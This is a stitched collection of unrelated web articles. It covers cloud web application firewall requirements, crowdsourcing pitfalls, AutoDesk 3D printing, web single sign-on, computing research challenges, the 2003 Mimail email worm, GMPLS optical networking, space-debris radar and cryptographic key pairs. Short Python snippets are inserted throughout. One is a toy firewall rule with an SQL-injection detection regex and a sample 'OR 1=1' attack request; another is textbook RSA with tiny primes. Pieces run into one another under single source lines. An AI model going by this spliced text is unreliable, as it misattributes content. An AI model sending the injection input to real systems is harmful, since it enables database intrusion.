The dWAF must be able to live in a wide variety of components to be effective without adding undue complexity for cloud service providers. Today’s providers are using a variety of traditional and virtual technologies to operate their clouds, so the ideal dWAF should accommodate this mixed environment and be available as a virtual software appliance, a plug-in, SaaS or be able to integrate with existing hardware. Flexibility with minimal disruption to the existing network is central.
A web-based user interface must allow customers to easily administer their applications. Configuration should be based on the applications under protection, not defined by a singular host, allowing far more granular settings for each application. Ruleset configuration must be supported by setup wizards. Statistics, logging and reporting have to be intuitive and easy to use, and must also integrate seamlessly into other systems. Most importantly for a dWAF, multi-administrator privileges must be made available and flexible enough to effectively manage widely divergent policy enforcement schemes. Cloud providers should look for a set of core protections.
Detection and protection
Foundational security using black, white and grey listings for application requests and responses must be possible. To make sure pre-set policy enforcements are not activated or deactivated without approval from an administrator, deployment and policy refinement through new rulesets must be possible in a shadow monitoring, detection-only mode. Only once a shadow-monitored ruleset is stable should it be deployed in enforcement mode on the dWAF. This gives the administrator complete transparency into the real-world effect of the ruleset, while allowing layered rulesets to be tested without compromising existing policy enforcement. Avoiding false positives without relaxing established defenses is essential for a real-world, usable dWAF in a cloud.
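The shadow-monitoring workflow can be made concrete with a toy rule engine. Everything here (the rule format, the function names, the crude SQL-injection pattern) is invented for illustration and is not taken from any real dWAF product:

```python
# Toy illustration of "detection only" vs. "enforcement" rulesets.
# A rule is just a predicate over a request string; names are invented.
import re

def sql_injection_rule(request):
    """Flag requests whose query string contains a crude SQLi pattern."""
    return bool(re.search(r"('|--|\bUNION\b|\bOR\b\s+1=1)", request, re.IGNORECASE))

def handle(request, rules, enforce=False):
    """Run rules in shadow mode (log only) or enforcement mode (block)."""
    hits = [rule.__name__ for rule in rules if rule(request)]
    if hits and enforce:
        return ("BLOCKED", hits)
    # In shadow mode the request passes but every hit is recorded, so an
    # administrator can judge false positives before turning enforcement on.
    return ("ALLOWED", hits)

req = "GET /items?id=1 OR 1=1"
print(handle(req, [sql_injection_rule], enforce=False))  # ('ALLOWED', ['sql_injection_rule'])
print(handle(req, [sql_injection_rule], enforce=True))   # ('BLOCKED', ['sql_injection_rule'])
```

The point of the two modes is visible in the output: the same hit is merely logged in shadow mode but blocks the request once enforcement is enabled.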
Automated learning and ruleset suggestions based on intelligent algorithms or recommendations from a static source code analyzer or web vulnerability scanner are also desirable from a manageability view. Again, this only holds true if the administrator retains full control over activation / deactivation of each ruleset. Without this control, wanted traffic may become blocked and policy settings would become compromised.
Pro-active security functions are highly recommended to reinforce any application in a cloud; detection alone is simply not enough for today’s web application security. Features like transparent secure session management, URL encryption and form-field virtualization provide strong deterrence to attack while saving application development and deployment time. These features are effective because session management, URL encryption and form-field virtualization are done at the dWAF level and not in the application itself.
Authentication framework support that enables businesses to consolidate their applications under one management schema is also desirable for a dWAF. This lets users handle authentication in front of their applications rather than behind them, which adds another perimeter of security. Consolidating all applications with dedicated rights management is also a strong usability function that will make an administrator’s life easier.
Integration with existing technology
Avoiding vendor lock-in is a common best practice for both networking and application security. Any technology that is added to an infrastructure, platform or application itself must connect as seamlessly as possible with existing technology. Security is all about layering technologies to create the best possible protection, so a dWAF must communicate freely with security information and event management (SIEM) systems.
So, what are the downsides of crowdsourcing? One of the pitfalls that catch businesses by surprise is privacy concerns. Netflix crowdsourced the improvement of its movie recommendation algorithm. The algorithm is critical to its business effectively helping users find new movies-something crucial in order to retain its users. The contest: improve the existing ranking algorithm by 10 percent and win $1 million.
The contest attracted scientists from around the world. The Netflix data was so rich and deep that it promised to yield broader insights about data analysis. Eventually, the scientists formed teams which collaborated to win the prize. Unfortunately, Netflix's attempt to run the contest again was cancelled due to a lawsuit that challenged the release of user preference data. So, crowdsourcing does not always fit the data, and there may be special concerns around private information.
Another issue that comes up is unexpected bias. GalaxyZoo is a Website where amateur astronomers can label pictures of galaxies taken by telescopes. They created the largest database of galaxies ever assembled. The project led to many academic papers and discoveries. However, one finding was perplexing: there were more clockwise spiral galaxies than counterclockwise spiral galaxies. Astronomers wondered if there was some galactic Coriolis effect that makes galaxies spiral clockwise. After running a mirrored set of the same images, researchers found that users had a subtle bias towards labeling ambiguous spiral galaxies as clockwise.
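The mirrored-image control that exposed the bias can be expressed as a simple arithmetic check: if volunteers label both the originals and their flipped copies mostly "clockwise", the excess is labeling bias rather than physics. The counts below are invented for illustration; they are not GalaxyZoo's actual numbers:

```python
# Sketch of the GalaxyZoo mirror test: if labels reflected the galaxies
# rather than the labellers, flipping every image would flip the label
# proportions. The counts below are invented purely for illustration.
def clockwise_fraction(labels):
    return labels.count("cw") / len(labels)

original = ["cw"] * 60 + ["ccw"] * 40   # 60% labelled clockwise
mirrored = ["cw"] * 55 + ["ccw"] * 45   # flipped copies: still >50% "cw"

# An unbiased crowd would give roughly 1 - clockwise_fraction(original)
# for the mirrored set; a persistent excess of "cw" labels on both sets
# is evidence of labelling bias, not of a real physical asymmetry.
bias = clockwise_fraction(original) + clockwise_fraction(mirrored) - 1.0
print(round(bias, 2))  # → 0.15
```

A result near zero would have vindicated the "galactic Coriolis effect" idea; a positive residual like this one points at the labellers instead.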
You've probably heard about 3D printing, a way of converting a computer file into a solid, physical object using a specially designed printer. The technology has been around for more than a decade, but it's always been the realm of industrial designers and manufacturers that could spend tens -- even hundreds -- of thousands of dollars on printers the size of refrigerators.
Now it's coming to your desktop, courtesy of AutoDesk, a developer of sophisticated computer-aided design (CAD) software.
AutoDesk this week launched two impressive software applications: One allows you to convert a picture (actually a whole bunch of pictures) into a digital file that can be printed as a solid plastic or metal model, while the other is used to convert a computer model into a sort of three-dimensional jigsaw puzzle made of cardboard or other materials. And best of all, the software is free, and if you don't have a 3D printer (who does?) you can upload the files you create to an AutoDesk partner, which will give you a cost estimate and then manufacture and ship as many of the objects as you want.
Actually, 3D printers have gotten a lot cheaper; the folks at AutoDesk told me you can buy one for as little as $1000, but I assume you won't run out and acquire one right away. I'll give you the highlights of my 90-minute visit with AutoDesk to talk about 3D printing, but I'd urge you to visit the company's Web site (and the links I provide below) to find out more.
Print in 3D or make a 3D jigsaw puzzle
3D printers are similar to inkjet printers, but instead of depositing ink on a page, they create three-dimensional objects by laying down successive layers of liquid plastic, powdered metal or other materials on top of a base. The better the printer, the more resolution (that is, detail) the object will contain.
The statue of Buddha, pictured above, was printed and rendered into plastic using AutoDesk's new program called 123D Catch and a 3D printer. To start the process, an AutoDesk employee slowly walked around the statue, taking a series of 50 or 60 photos from different angles. Those photos were then uploaded into the program and sent via the Internet to an AutoDesk server where they were converted into a 3D file.
The file was then moved to a 3D printer, which produced the statue. Because it's so large, it would cost about $800 for you to do the same thing, but a smaller version of the Buddha statue would only cost about $50, said Hendrik Bartel, an Autodesk senior product manager.
The program also allows you to convert those same photos into a 3D animation you can post on YouTube or email to someone else.
Because all of the complex calculations to turn the photos into a 3D file are performed in the cloud, you can run the program on a standard Windows PC. A Mac version of 123D Catch will follow in the not-too-distant future.
A second application, 123D Make (for now, Mac only), takes a 3D image of an object and converts it into a file that in turn instructs a laser-guided saw to inscribe a pattern onto a flat surface such as cardboard or wood. The patterns can then be cut out and assembled by the end user (you) to form a 3D model of the original image.
The easiest way to grasp this is to think about starting with a solid object, and then slicing it vertically or horizontally or at an angle. Before long you'd have a bunch of flat slices sitting on your desk. The program numbers each slice and prints out directions for reassembling the slices into a 3D model that you glue together. The original images can be imported from another 3D program or you can work with one of the images that comes with the application.
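The slicing idea can be sketched in a few lines: given an object's height and the thickness of the sheet material, compute the height of each cutting plane. This is a toy illustration, not 123D Make's actual algorithm:

```python
# Toy illustration of slicing a solid into numbered flat layers,
# the way 123D Make's output is described above. Not the real algorithm.
def slice_heights(object_height_mm, sheet_thickness_mm):
    """Return the z-height of each slice plane, bottom to top."""
    n = int(object_height_mm // sheet_thickness_mm)
    return [round(i * sheet_thickness_mm, 2) for i in range(n)]

# A 30 mm tall object cut from 4 mm cardboard yields 7 numbered layers:
print(slice_heights(30, 4))  # → [0, 4, 8, 12, 16, 20, 24]
```

Each returned height corresponds to one numbered cardboard slice; stacking and gluing them in order rebuilds the original shape.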
Obviously, very few of us have laser-guided cutters, so you can simply upload the file to AutoDesk, get a cost estimate from one of the company's partners, who will then send you a stack of cardboard with the puzzle pieces laid out and ready to be cut with a sharp knife and assembled. Those puzzles would make great holiday presents, though some younger recipients might find the puzzle a bit, well, puzzling.
Catch and Make are part of a larger family of AutoDesk consumer 3D printing products which you can read about here. | <urn:uuid:30d02d69-a479-4211-9abc-4dffbc01a459> | CC-MAIN-2017-04 | http://www.cio.com/article/2371827/consumer-technology/autodesk-brings-3d-printing-to-your-desktop.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284405.58/warc/CC-MAIN-20170116095124-00561-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.950879 | 919 | 2.796875 | 3 |
A Web access management (WebAM or WebSSO) system is middleware used to move the authentication and authorization of users out of individual web applications, to a shared platform.
A WebAM system intercepts initial contact by the user's web browser to a web application and either verifies that the user had already been authenticated (typically tracking authentication state in a cookie) or redirects the user to an authentication service, where the user may use a password, token, PKI certificate or other method to sign in.
Once a user is authenticated, the WebAM system connects the user to the application and passes identity data to the application, which need not authenticate the user itself. Some applications support direct injection of identities and require no password at all, but other applications require users to connect with a password, in which case the WebAM system must maintain a database of passwords for all users, injecting them on demand.
WebAM systems can also limit user access within applications, for example by filtering what URLs users can access or through closer integration with individual applications, which use a WebAM API to decide whether a user should be allowed to access a given function or not.
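The interception flow described above (check a session cookie, redirect unauthenticated users to a shared login service, and filter URLs per user) can be sketched as a minimal gatekeeper function. The cookie value, login URL, header name and access rules are all invented for illustration:

```python
# Minimal sketch of WebAM-style interception: check an authentication
# cookie, redirect unauthenticated users, and filter URLs per user.
# The session table, ACL, login URL and header name are all invented.
SESSIONS = {"abc123": "alice"}                 # session-id -> user
ACL = {"alice": ["/app", "/app/reports"]}      # user -> allowed URL prefixes

def access(url, cookie):
    user = SESSIONS.get(cookie)
    if user is None:
        # Not authenticated: redirect the browser to the shared login service.
        return (302, "/login?return=" + url)
    if not any(url.startswith(prefix) for prefix in ACL.get(user, [])):
        return (403, "forbidden")
    # Authenticated and authorized: pass identity downstream in a header,
    # so the application itself never has to verify a password.
    return (200, "X-Remote-User: " + user)

print(access("/app/reports", "abc123"))   # (200, 'X-Remote-User: alice')
print(access("/app", None))               # (302, '/login?return=/app')
print(access("/admin", "abc123"))         # (403, 'forbidden')
```

The three outcomes correspond to the three behaviors described above: identity injection for authorized users, redirection to the authentication service, and URL-based denial.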
WebAM systems normally rely on an LDAP directory to identify and authenticate users.
WebAM systems are mainly designed to work with applications that cannot externalize identification, authentication or authorization using standards-based federation protocols. | <urn:uuid:dced5671-d714-4018-b0c3-743c62f075a3> | CC-MAIN-2017-04 | http://hitachi-id.com/resource/concepts/web-sso.html | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280899.42/warc/CC-MAIN-20170116095120-00103-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.887321 | 282 | 2.640625 | 3 |
On the Cutting Edge of High-Tech
The Computing Research Association recently released a report that lists five “Grand Research Challenges” in high technology. These challenges, which relate to building information systems of the future, provide long-term goals for the research community and read almost like science fiction. Appearing on the list are a post-disaster safety net and “cognitive partners” for humans including robots and software.
The report is the result of a three-day workshop supported by the National Science Foundation, attended by 65 leading computer science and engineering researchers. The invitation-only conference asked attendees to choose five “deliberately monumental” research challenges. Attendees were supposed to choose challenges that would require at least 10 years of concentrated research in order to progress. This workshop was the first in a series of workshops on Grand Challenges for IT research. The next workshop is scheduled for November 2003 and will cover the topic of computer security.
According to the report, the five Grand Challenges are:
- Create a Ubiquitous Safety.Net: In order to minimize damage from disasters and to save lives, a Web of systems should be in place to predict, prevent, mitigate and respond to natural and man-made disasters.
- Build a Team of Your Own: Cognitive partnerships of humans with software and robots will allow people to achieve complex goals. The technological agents will help amplify physical capabilities as well as attending to specialized thought processes. This, according to the report, will bring about greater personal productivity and effectiveness.
- Provide a Teacher for Every Learner: There’s no doubt that learning is now lifelong. This challenge involves helping all students to receive instruction that is tailored to their personal learning styles in “an environment of unlimited digital resources.”
- Build Systems You Can Count On: Reliable and secure systems are a necessity, and this great challenge is to ensure that all systems—everything from the regional electric grid to individual heart monitors—are reliable and secure.
- Conquer System Complexity: Large-scale information systems are complex. If researchers can overcome this complexity, they can bring about greater use of information systems and help realize the four preceding challenges.
The report states, “In the future, we can expect our computational infrastructure to offer an even more impressive range of social and economic benefits as it grows to include billions of people worldwide. Information technologies have the potential to reduce energy consumption, provide improved health care at lower cost, enhance security, reduce pollution, enable further creation of worldwide communities, engender new business models and contribute to the education of people anywhere in the world.”
You can find the report at http://www.cra.org/Activities/grand.challenges/.
Emily Hollis is associate editor for Certification Magazine. She can be reached at firstname.lastname@example.org. | <urn:uuid:fa19e801-4703-4a6a-a09d-e16b7502d191> | CC-MAIN-2017-04 | http://certmag.com/on-the-cutting-edge-of-high-tech/ | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560284429.99/warc/CC-MAIN-20170116095124-00405-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.937293 | 584 | 2.890625 | 3 |
Mimail - A New Attack Via an Old Breach
02 Aug 2003
New fun and games from Russian virus writers
Kaspersky Lab, a leading expert in information security, would like to inform you about Mimail, a new Internet worm. Our round-the-clock technical support has already heard of numerous computers infected with this new worm.
Mimail is a typical Internet worm that is spread via email. Infected mail contains a false sender address making it difficult to identify the sender and contains the following text:
Subject: your account 'number' (this is a random number)
Body:
I would like to inform you about important information regarding your email address. This email address will be expiring.
Please read attachment for details.
Best regards, Administrator
Mimail is similar to other worms such as Klez and Lentin (Yaha) in that it enters using security breaches in Internet Explorer. The attachment, MESSAGE.ZIP, contains another file, MESSAGE.HTML.
If the user opens MESSAGE.HTML, the built-in JavaScript executes via Exploit.SelfExecHTML and copies the worm to disk. It then releases a carrier file named VIDEODRV.EXE and registers this file in the Windows autorun registry key, so VIDEODRV.EXE is launched every time the computer is rebooted.
Mimail also creates several other files in the Windows directory: EXE.TMP (an HTML worm), ZIP.TMP (an archived worm) and EML.TMP (the email component).
Microsoft discovered the Exploit.SelfExecHTML problem in March 2002 and has released a special patch for Internet Explorer. Kaspersky Lab strongly recommends downloading this patch in order to prevent further security issues via this breach.
The rapid spread of Mimail is a good reminder that dangerous programs are not only found in EXE files. "It is always a good idea to check all files for viruses before booting up", comments Eugene Kaspersky, founder of Kaspersky Lab and head of anti-virus research.
Mimail continues to spread by scanning directories on the local hard drive. It extracts email-like text strings from the files it finds and records them in EML.TMP in the Windows directory. Mimail then uses a direct connection to the mail server to send copies of itself to these recipients.
Mimail is likely to be the work of Russian virus writers. The hackers used technology practically identical to the Trojan StartPage, which was also written in Russia.
"We were lucky this time", notes Eugene Kaspersky, "Mimail is a relatively harmless worm with no serious side effects. The danger is that Mimail takes advantage of a vulnerability in Internet Explorer, which sets a dangerous precedent for other virus writers and hackers."
Security measures against Mimail can be found in the Kaspersky® Anti-Virus databases, while a more detailed description of the worm is available in the Kaspersky Virus Encyclopedia.
Bandwidth requirements in networks are constantly changing, driven by the deployment of new services and the increasing penetration of existing services. These requirements are further complicated by the migration to on-demand services and to IP-based services.
Factor in the need to maintain quality of service (QoS) across a wide range of services, and effective bandwidth management becomes critical to today's networks. At the competitive level, pressures are growing to accelerate service delivery and network migration while lowering overall network costs (CapEx and OpEx). To meet all these demands, an overall bandwidth management mechanism is needed, one which substantially automates network operation while providing flexibility and ensuring adequate QoS. This is particularly true at the optical layer, where requirements are rapidly evolving. GMPLS (generalized multi-protocol label switching) provides such a mechanism and is available today.
MPLS (multi-protocol label switching) has been used in IP networks for many years to couple Layer 2 devices (for example, Ethernet switches) more tightly to IP routers at Layer 3. As such, MPLS allows these Layer 2 devices to serve as extensions of the routers at Layer 3, thereby giving much better control and integration of the overall IP network at both Layers. MPLS was initially developed to bring the speed of Layer 2 switching to Layer 3, but MPLS has found many wider applications and benefits and is now broadly standardized and in use in networks across the country.
In an MPLS network, edge routers assign a "label" to incoming packets. As these packets traverse the network, a label switched path (LSP) is created from the ingress to the egress point. These packets are then forwarded along the LSP by a label switch router (LSR), which makes forwarding decisions based on the contents of the label, rather than by the IP address. Attributes are assigned to the label that define how the LSR should handle the packets in the LSP.
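The label-swapping behavior described above can be sketched in a few lines of Python. This is a toy model, not a real LSR implementation: the node names, label values and table layout are invented purely for illustration.

```python
# Toy model of MPLS label switching: each LSR forwards on the label alone,
# swapping it per its table, without ever consulting the IP header.
# Node names and label numbers are invented for illustration.

FORWARDING_TABLES = {
    "ingress": {None: (17, "lsr_a")},      # ingress pushes initial label 17
    "lsr_a":   {17: (22, "lsr_b")},        # swap 17 -> 22, forward to lsr_b
    "lsr_b":   {22: (30, "egress")},       # swap 22 -> 30, forward to egress
    "egress":  {30: (None, "delivered")},  # pop label, deliver packet
}

def forward(packet_label, node, path=None):
    """Follow an LSP hop by hop, returning the sequence of nodes visited."""
    path = path or [node]
    out_label, next_hop = FORWARDING_TABLES[node][packet_label]
    path.append(next_hop)
    if next_hop == "delivered":
        return path
    return forward(out_label, next_hop, path)

print(forward(None, "ingress"))
# ['ingress', 'lsr_a', 'lsr_b', 'egress', 'delivered']
```

Note that once the tables are installed, forwarding never looks at the destination address, which is what makes LSPs behave like circuits.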
LSPs can be created based upon a wide range of criteria and for a wide range of reasons. Typically, LSPs are used to route around or avoid network congestion, to guarantee a certain level of performance, or to create IP tunnels through a network for virtual private networks (VPNs). As such, LSPs look very much like circuit-switched paths in ATM networks. However, MPLS is not constrained to a particular Layer 2 technology and can create end-to-end circuits with defined performance over any transport layer. More typically today, MPLS is used within Ethernet networks.
Initial efforts to standardize MPLS began in 1997 at the IETF (Internet Engineering Task Force), which is still the primary standards body for MPLS, though several other organizations also create or contribute to MPLS standards and extensions. As MPLS evolved, it became widely recognized that the benefits of MPLS could be extended to Layer 1 at the optical level, and GMPLS was developed to address this need. The IETF is also primarily responsible for GMPLS standards. While both MPLS and GMPLS standards are still evolving and being developed, core standards are in place and in use today for both.
GMPLS extends MPLS into the Layer 1 optical network by allowing the creation of label switched paths in the optical network. Thus, GMPLS can serve as a control mechanism for devices such as optical add-drop multiplexers (OADMs) and optical cross-connect switches (OXCs), operating in both the wavelength (DWDM lambda) and spatial domains.
GMPLS supports both peer and overlay operational modes. In the peer mode, all devices in a given network domain interoperate over the same control plane. This provides true operational integration of OADMs, OXCs, and routers. Routers have visibility into the optical network topology and peer directly with OADMs and OXCs. In the overlay mode, the optical and routed IP layers are separate. In this mode, GMPLS is used to manage and optimize the optical layer without interaction with Layer 3. To date, most deployments of GMPLS use the overlay model, but provide a future migration path to the peered model.
Overlay GMPLS brings significant traffic engineering and management capabilities to optical networks and supports virtually full automation of optical network operations, including topology auto-discovery, span loss measurement, network element and inventory discovery, optical layer turn-up, dynamic network optimization, fault detection and correction, service turn-up, wavelength set-up and tear-down, node insertion, and network evolution. The benefits of a GMPLS-based optical network are obvious: a drastic reduction in operational costs and greatly accelerated network upgrades and delivery of new services.

GMPLS at the optical layer
While a broad discussion of GMPLS is beyond the scope of this article, a brief overview is useful to understand how GMPLS works at the optical layer. As already mentioned, MPLS works by creating label switched paths. In optical networks, these LSPs behave similarly to circuits and may be defined as anything sufficient to identify a traffic flow: a fiber, a lambda, a timeslot, etc.
The LSPs in the optical network are established through the use of routing and signaling protocols. In GMPLS, OSPF (Open Shortest Path First) and IS-IS (Intermediate System to Intermediate System) interior gateway routing protocols (IGPs) are used to exchange information between OADMs and OXCs about network topology, resource capabilities and availability, and network policies.
This information is then applied as input into a constraint-based algorithm that computes network paths based upon topology, resource availability, and service requirements. Constraint-based routing allows the network to automatically provision additional bandwidth based upon congestion, shifting service or content-on-demand requirements, or other network parameters. Once an appropriate path has been defined, a signaling protocol such as RSVP-TE (Resource Reservation Protocol for Traffic Engineering) or CR-LDP (Constraint-Based Label Distribution Protocol) is used to create the service connection along the path and reserve resources for it. Additional link management functions are implemented using LMP (Link Management Protocol), which runs between adjacent nodes. LMP provides control channel connectivity and failure detection. Once the path is established end-to-end, user traffic may flow through it.
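The constraint-based computation described above can be illustrated with a small Python sketch: a standard shortest-path search in which links that cannot meet the service's bandwidth requirement are pruned before the search runs. The topology, link costs and bandwidth figures are invented for the example.

```python
import heapq

# Sketch of constraint-based path computation: ordinary shortest-path
# routing, but links without enough spare bandwidth for the requested
# service are pruned. Topology and figures are invented for illustration.

# Each entry: (neighbor, cost, available_bandwidth_gbps)
TOPOLOGY = {
    "A": [("B", 1, 40), ("C", 1, 10)],
    "B": [("A", 1, 40), ("D", 1, 40)],
    "C": [("A", 1, 10), ("D", 1, 10)],
    "D": [("B", 1, 40), ("C", 1, 10)],
}

def constrained_path(src, dst, min_bw):
    """Dijkstra over only those links that satisfy the bandwidth constraint."""
    queue = [(0, src, [src])]
    seen = set()
    while queue:
        cost, node, path = heapq.heappop(queue)
        if node == dst:
            return path
        if node in seen:
            continue
        seen.add(node)
        for nbr, link_cost, bw in TOPOLOGY[node]:
            if bw >= min_bw and nbr not in seen:
                heapq.heappush(queue, (cost + link_cost, nbr, path + [nbr]))
    return None  # no path satisfies the constraint

print(constrained_path("A", "D", min_bw=2))   # both routes qualify
print(constrained_path("A", "D", min_bw=25))  # the 10G links are pruned; goes via B
```

In a real network the signaling protocol (RSVP-TE or CR-LDP) would then reserve resources along the chosen path before traffic flows.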
Of course, GMPLS can only provide as many capabilities as are supported by the underlying OADMs and OXCs in the network. And since we are discussing automated reconfiguration of the network by GMPLS to control bandwidth, this implies the OADMs and OXCs in the network must also be fully reconfigurable. To achieve the full benefits of GMPLS, this means that all essential operating parameters of the OADMs and OXCs must be remotely configurable via software.
Figure 1: GMPLS architecture with reconfigurable optical add/drop multiplexer (ROADM).
To address these requirements, a new class of reconfigurable OADMs (ROADMs) has been developed which provides fully automated and remote network configuration (see Figure 1). To provide this capability, four elements are essential to a ROADM. First, the ROADM must provide a means of selectively dropping wavelengths at nodes where local traffic is to be handed off (or passing these wavelengths directly through in the optical domain to their destination). Typically this is handled by a wavelength selective switch (WSS), which ideally should provide non-restrictive, single wavelength granularity. Second, the ROADM must support tunable lasers so that wavelengths may be remotely assigned or recycled at any time. Third, the ROADM should provide an optical backplane, which eliminates multiple manual optical jumpers and the need to roll a truck to re-configure these jumpers when network changes are made. Finally, the ROADM must support the GMPLS control plane which provides the intelligence and control for network automation.
Figure 2: GMPLS architecture with reconfigurable optical switching platform.
Similarly, a new class of reconfigurable OXCs has emerged to provide automated optical switching between fibers and networks, wavelength translation, and multicast service replication for services such as broadcast digital TV (see Figure 2).
As with ROADMs, these optical switching platforms provide fully remote reconfiguration and typically integrate wavelength transport in the platform along with GMPLS. The key element here, of course, is a non-blocking, redundant switch fabric to provide the cross-connect capabilities. This switching may be done in the optical or electrical domain, but doing so in the electrical domain allows additional traffic grooming at the protocol or packet level and enables additional regeneration, reshaping, and retiming of the signals at each node to simplify network engineering. These platforms are ideal for aggregation applications, mesh networks, and n-degree networks.
As networks migrate to peered GMPLS, significant additional capabilities can be realized. With routers peered directly with OADMs and OXCs, these Layer 1 devices can be controlled at Layer 3, which enables routers to reconfigure the optical network. This opens the door for assigning lambdas on-demand based upon congestion avoidance, increased bandwidth requirements driven by content-on-demand, or the need to create new protection paths through the network.
GMPLS is primarily focused today on automating the operation of optical networks, enabling automated network self-discovery, optical layer turn-up, dynamic real-time network optimization, and network evolution. This is particularly of value in WDM (wavelength division multiplexing) networks where manual engineering, configuration, and provisioning are expensive and time-consuming. GMPLS greatly reduces the operational complexity of WDM optical networks while accelerating network and service turn-up. Future implementations of GMPLS will allow greater interoperability at the optical layer between equipment in the network and will allow bandwidth to be assigned on-demand in real time at the optical layer (wavelength routing) to support dynamically shifting network requirements.
Some work has begun on tracking and detecting the overabundance of space junk which has become a growing priority as all manner of satellites, rockets and possible commercial space shots are promised in the coming few years.
Today Northrop Grumman said it grabbed $30 million from the US Air Force to start developing the first phase of a global space surveillance ground radar system. The new S-Band Space Fence is part of the Department of Defense's effort to track and detect what are known as resident space objects (RSOs), consisting of thousands of pieces of space debris as well as commercial and military satellites. The new Space Fence will replace the current VHF Air Force Space Surveillance System built in 1961.
According to GlobalSecurity.org, the current Space Fence includes nine sites located on a path across the southern United States from Georgia to California along the 33rd parallel and consists of three transmitter and six receiver sites. The main transmitting station, located at Lake Kickapoo, Texas, has an average power output of 766,800 watts feeding a two-mile-long antenna array. It provides the primary source of illumination. Two other transmitting stations are located at Jordan Lake, Alabama, and Gila River, Arizona. These stations, with an average power output of approximately 40,000 watts each, improve low-altitude illumination at the sides of the main beam.
Australia is a candidate for the first new Space Fence location. Two additional sites in other parts of the world are also under consideration, Northrop stated.
The Space Fence will provide continuous space situational awareness by detecting smaller objects in low and medium earth orbit. The current system requires constant sustainment intervention to maintain operations and does not address the growing population of small and micro satellites in orbit, Northrop stated.
"The new Space Fence system will provide better accuracy and faster detection while allowing us to increase the number of satellites and other space objects that can be detected and tracked, thus avoiding collision and damage to other satellites," said Rich Davis, director of special projects at Northrop Grumman's Advanced Concepts and Technology Division.
The need for such a system seems obvious, especially since an Iridium satellite smacked into an inactive Russian Cosmos-2251 military satellite in February. In April, NASA’s Nicholas Johnson, Chief Scientist for Orbital Debris at the Johnson Space Center, told a congressional hearing that the United States Space Surveillance Network, managed by U.S. Strategic Command, is tracking more than 19,000 objects in orbit about the Earth, of which approximately 95 percent represent some form of debris. However, these are only the larger pieces of space debris, typically four inches or more in diameter. The number of debris objects as small as half an inch exceeds 300,000. Due to the tremendous energies possessed by space debris, a collision between a piece of debris only a half-inch in diameter and an operational spacecraft, whether piloted by humans or robotic, has the potential for catastrophic consequences, he stated.
The near-Earth space debris environment ranges in altitude from 100 to more than 20,000 miles above Earth, and the debris itself ranges in mass from less than an ounce to many tons. Consequently, this population of space debris is a matter of growing concern for all space-faring nations, Johnson stated.
According to Johnson, during 2008, NASA twice maneuvered robotic spacecraft of the Earth Observation System in low Earth orbit and once maneuvered a Tracking and Data Relay Satellite in geosynchronous orbit to avoid potential collisions. Twice since last August, the International Space Station has conducted collision avoidance maneuvers.
For the 35 years from mid-1961 to mid-1996, the population of cataloged objects that are four inches in size or larger in Earth orbit increased at an average rate of 270 per year. However, with the concerted efforts of the major space-faring nations of the world, the rate dropped dramatically to only 70 per year for the next decade.
Unfortunately, the intentional destruction of the Chinese Fengyun-1C weather satellite in January of 2007 and the accidental collision of American and Russian spacecraft in February of this year have increased the cataloged debris population by nearly 40%, in comparison with all the debris remaining from the first 50 years of the Space Age, Johnson stated.
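The growth rates quoted above imply a rough size for the catalog, which puts that 40% jump in perspective. The quick arithmetic below uses only the averages given in this article, so the totals are approximate:

```python
# Rough cumulative-catalog arithmetic from the growth rates quoted above
# (270 objects/year for 1961-1996, 70/year for the following decade).
# Averages only, so these totals are approximate.

growth_1961_1996 = 35 * 270      # 9,450 objects over 35 years
growth_1996_2006 = 10 * 70       # 700 objects over the next decade
baseline = growth_1961_1996 + growth_1996_2006

# The Fengyun-1C destruction and the 2009 collision are said to have added
# nearly 40% on top of everything remaining from the first 50 years.
added_by_two_events = 0.40 * baseline

print(baseline)                    # ~10,150 objects from routine growth
print(round(added_by_two_events))  # ~4,060 more from just two events
```

In other words, two incidents contributed on the order of four thousand new cataloged objects, roughly what routine launch activity had produced over several decades at the slower rate.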
Who needs a key pair?
Anyone who wishes to sign messages or to receive encrypted messages must have a key pair. People may have more than one key pair. In fact, it is advisable to use separate key pairs for signing messages and receiving encrypted messages. As another example, someone might have a key pair affiliated with his or her work and a separate key pair for personal use. Other entities may also have key pairs, including electronic entities such as modems, workstations, web servers (web sites) and printers, as well as organizational entities such as a corporate department, a hotel registration desk, or a university registrar's office. Key pairs allow people and other entities to authenticate (see Question 2.2.2) and encrypt messages.
Corporations may require more than one key pair for communication. They may use one or more key pairs for encryption (with the keys stored under key escrow to safeguard the key in event of loss) and use a single non-escrowed key pair for authentication. The lengths of the encryption and authentication key pairs may be varied according to the desired security. | <urn:uuid:116d0799-bba5-442e-a8af-e982bb9112c3> | CC-MAIN-2017-04 | https://www.emc.com/emc-plus/rsa-labs/standards-initiatives/who-needs-a-key-pair.htm | null | s3://commoncrawl/crawl-data/CC-MAIN-2017-04/segments/1484560280239.54/warc/CC-MAIN-20170116095120-00178-ip-10-171-10-70.ec2.internal.warc.gz | en | 0.930115 | 234 | 3 | 3 |
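To make the "separate key pairs" advice concrete, here is a toy Python sketch that generates one RSA-style pair for signing and an independent pair for receiving encrypted messages. The primes are tiny and the scheme omits padding and hashing, so it illustrates the mechanics only and must never be used for real security (use a vetted cryptographic library in practice).

```python
# Toy illustration of the "separate key pairs" advice: one RSA-style pair
# for signing, another for receiving encrypted messages. Textbook RSA with
# tiny primes -- for explanation only, never for real security.

def make_keypair(p, q, e=17):
    n = p * q
    phi = (p - 1) * (q - 1)
    d = pow(e, -1, phi)          # private exponent (Python 3.8+ modular inverse)
    return (e, n), (d, n)        # (public key, private key)

# Two independent pairs, as the FAQ recommends.
sign_pub, sign_priv = make_keypair(61, 53)
enc_pub, enc_priv = make_keypair(89, 97)

def sign(msg_digest, priv):
    d, n = priv
    return pow(msg_digest, d, n)

def verify(msg_digest, signature, pub):
    e, n = pub
    return pow(signature, e, n) == msg_digest

def encrypt(m, pub):
    e, n = pub
    return pow(m, e, n)

def decrypt(c, priv):
    d, n = priv
    return pow(c, d, n)

digest = 1234                      # stand-in for a message hash
sig = sign(digest, sign_priv)
assert verify(digest, sig, sign_pub)

secret = 4321
assert decrypt(encrypt(secret, enc_pub), enc_priv) == secret
```

Keeping the two pairs independent means an escrowed encryption key never weakens the signing key, which is exactly the separation the FAQ describes for corporate use.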
